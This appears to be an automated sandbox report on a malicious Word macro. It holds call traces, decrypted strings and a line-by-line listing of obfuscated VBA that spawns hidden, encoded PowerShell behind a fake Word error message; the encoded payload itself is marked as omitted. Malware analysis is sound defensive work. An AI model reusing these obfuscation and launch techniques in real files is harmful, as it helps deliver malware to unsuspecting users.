                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        JjBKEUXqH

                                        Close

                                        GEopA

                                        CreateObject

                                        CreateObject("winmgmts:win32_process")

                                        BuEcDJvc

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        JkICEEJbA

                                        Close

                                        hrqzdCF

                                        Mid

                                        Len

                                        Len([obfuscated command string omitted]) -> 17453

                                        SYgbDdCEH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        IuDSasFIm

                                        Close

                                        LUJoKCCQ

                                        xDUMl

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        TFPJDBSa

                                        Close

                                        hKDFekFGF

                                        Create

                                        SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded payload omitted],,) -> 0

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        L_4bpvggv2vokj75

                                        Nakuayuxnnrg5

                                        IYlnG

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        nEFlbEa

                                        Close

                                        ClgfEDCg

                                        UcUhFvH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        ncXeGEGfF

                                        Close

                                        kIALACE

                                        Strings | Decrypted Strings
                                        "Uvktlkqthymnm68w""Ti33bl29fw_53yu"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU"
                                        "HNkPCvHSVKIC"
                                        "CColSRKUqE"
                                        "txLTFDcUtlBJi"
                                        "]anw[3""p]anw[3"
                                        "]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "tNUBI:\bUxfKyODA\ZyrvC.WCgQpU"
                                        "TzymSNqRGdH"
                                        "NkEpBgFHAsWaxHT"
                                        "FCWeAwOsytUsCF"
                                        "]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC"
                                        "LhUxJGiLUCZp"
                                        "QkKSDHgSXaAA"
                                        "RmlAGEzIZqLPNdIDj"
                                        "w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "JhEjHJH:\heHcF\xIjwBCI.IWEODGR"
                                        "QCgbCFzJiDJUEIHES"
                                        "AfSXEBzJIIxvQmJC"
                                        "zDOlFEIFBVWkPbIC"
                                        "]anw[3""]anw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "HrrfJtDR:\BPgVNA\eowWDqCnB.iaEjRFDB"
                                        "xfhECJccxFyA"
                                        "AdLOPbWTXOCCRm"
                                        "cWptEtSbgvWCAD"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "ayAqsH:\opXXFq\UykoCNloH.lEEiEJlG"
                                        "wOTiEDqNZtWN"
                                        "xaOQJbzFVCXtJADD"
                                        "ufltvttBnHJNx"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "JYXoyLAMu:\EFBhEtGsQ\owfrHBHf.anGOrJLhY"
                                        "GqSFCtOyDYdfx"
                                        "QsixYFOXyEEAmh"
                                        "QxWCtMBxGzkkBAU"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "LPJPJFI:\CTzVF\dLRZEH.maUZE"
                                        "RMNuAAEfwmHGkp"
                                        "YfIwYFFntmmdDsPv"
                                        "nbBVBbrmTJhR"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "zGzGFMUJD:\QkpIYHOrc\FwQpsJ.ddKnHUJB"
                                        "JNHUAINVrwxEKEHD"
                                        "EXrpEHndyyG"
                                        "TwoNCIGurJPYA"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "sucQc:\iYsaHyNC\NiIqHAH.mTesbI"
                                        "GApbBIepzWxnI"
                                        "lkkOeHeJHjmGONABFI"
                                        "lSOfQyhpoF"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "SQhZmTV:\ITZNAskG\hSsqo.sNJcmiGF"
                                        "ehJSnoaWvoCEfGL"
                                        "uAYnHfspvFJ"
                                        "GuEmEfvZLaJDIAX"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "DNCEiIDxC:\EYevg\MFdKF.RmyPCLa"
                                        "jyJEJqDCTEnyIA"
                                        "pIHMJANYJmFIe"
                                        "tZZjtwJRCQcVAD"
                                        Line | Instruction | Meta Information
                                        2

                                        Function Rvpv59xrvp7m2wb()

                                        3

                                        On Error Resume Next

                                        executed
                                        4

                                        Cju6d_0v951 = "Uvktlkqthymnm68w" + "Ti33bl29fw_53yu"

                                        5

                                        sf4 = Xj1p0_yor4q8g + Teh9tkv0p83u4g.StoryRanges.Item(2 / 2) + Gdmbhv991jtvgzq

                                        Xj1p0_yor4q8g

                                        Item

                                        Gdmbhv991jtvgzq

                                        6

                                        Goto eRxrHHEBB

                                        7

                                        Dim TptSCH as Object

                                        8

                                        Set UnVnjA = hlEyDCTAH

                                        hlEyDCTAH

                                        9

                                        Set TptSCH = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        10

                                        Dim eRxrHHEBB as Object

                                        11

                                        Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")

                                        CreateTextFile

                                        12

                                        eRxrHHEBB.WriteLine "HNkPCvHSVKIC"

                                        WriteLine

                                        13

                                        eRxrHHEBB.WriteLine "CColSRKUqE"

                                        WriteLine

                                        14

                                        eRxrHHEBB.WriteLine "txLTFDcUtlBJi"

                                        WriteLine

                                        15

                                        Set VNhJZVCB = eHrGyvyM

                                        eHrGyvyM

                                        16

                                        eRxrHHEBB.Close

                                        Close

                                        17

                                        Set TptSCH = Nothing

                                        18

                                        Set IYUAEB = cVkLD

                                        cVkLD

                                        19

                                        Set eRxrHHEBB = Nothing

                                        19

                                        eRxrHHEBB:

                                        21

                                        t3s = "]anw[3" + "p]anw[3"

                                        22

                                        Eyshwbjqie_zkc = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                        23

                                        Goto UaCEJEERD

                                        24

                                        Dim bwdNxC as Object

                                        25

                                        Set zubYHA = tIaWTAJA

                                        tIaWTAJA

                                        26

                                        Set bwdNxC = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        27

                                        Dim UaCEJEERD as Object

                                        28

                                        Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")

                                        CreateTextFile

                                        29

                                        UaCEJEERD.WriteLine "TzymSNqRGdH"

                                        WriteLine

                                        30

                                        UaCEJEERD.WriteLine "NkEpBgFHAsWaxHT"

                                        WriteLine

                                        31

                                        UaCEJEERD.WriteLine "FCWeAwOsytUsCF"

                                        WriteLine

                                        32

                                        Set gnToaBcmF = PvcTcFOF

                                        PvcTcFOF

                                        33

                                        UaCEJEERD.Close

                                        Close

                                        34

                                        Set bwdNxC = Nothing

                                        35

                                        Set tNngtUo = chutdOAFs

                                        chutdOAFs

                                        36

                                        Set UaCEJEERD = Nothing

                                        36

                                        UaCEJEERD:

                                        38

                                        Pmgv9nf28vkxhyvys = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                        39

                                        Goto uwCSCCEO

                                        40

                                        Dim KTDSIL as Object

                                        41

                                        Set deuxb = XhUYUbSBA

                                        XhUYUbSBA

                                        42

                                        Set KTDSIL = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        43

                                        Dim uwCSCCEO as Object

                                        44

                                        Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")

                                        CreateTextFile

                                        45

                                        uwCSCCEO.WriteLine "LhUxJGiLUCZp"

                                        WriteLine

                                        46

                                        uwCSCCEO.WriteLine "QkKSDHgSXaAA"

                                        WriteLine

                                        47

                                        uwCSCCEO.WriteLine "RmlAGEzIZqLPNdIDj"

                                        WriteLine

                                        48

                                        Set PuAVBFFM = pzqeBGIAH

                                        pzqeBGIAH

                                        49

                                        uwCSCCEO.Close

                                        Close

                                        50

                                        Set KTDSIL = Nothing

                                        51

                                        Set pGLWAAGJ = TbHJC

                                        TbHJC

                                        52

                                        Set uwCSCCEO = Nothing

                                        52

                                        uwCSCCEO:

                                        54

                                        Agz22fuzun5rgvbir = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                        55

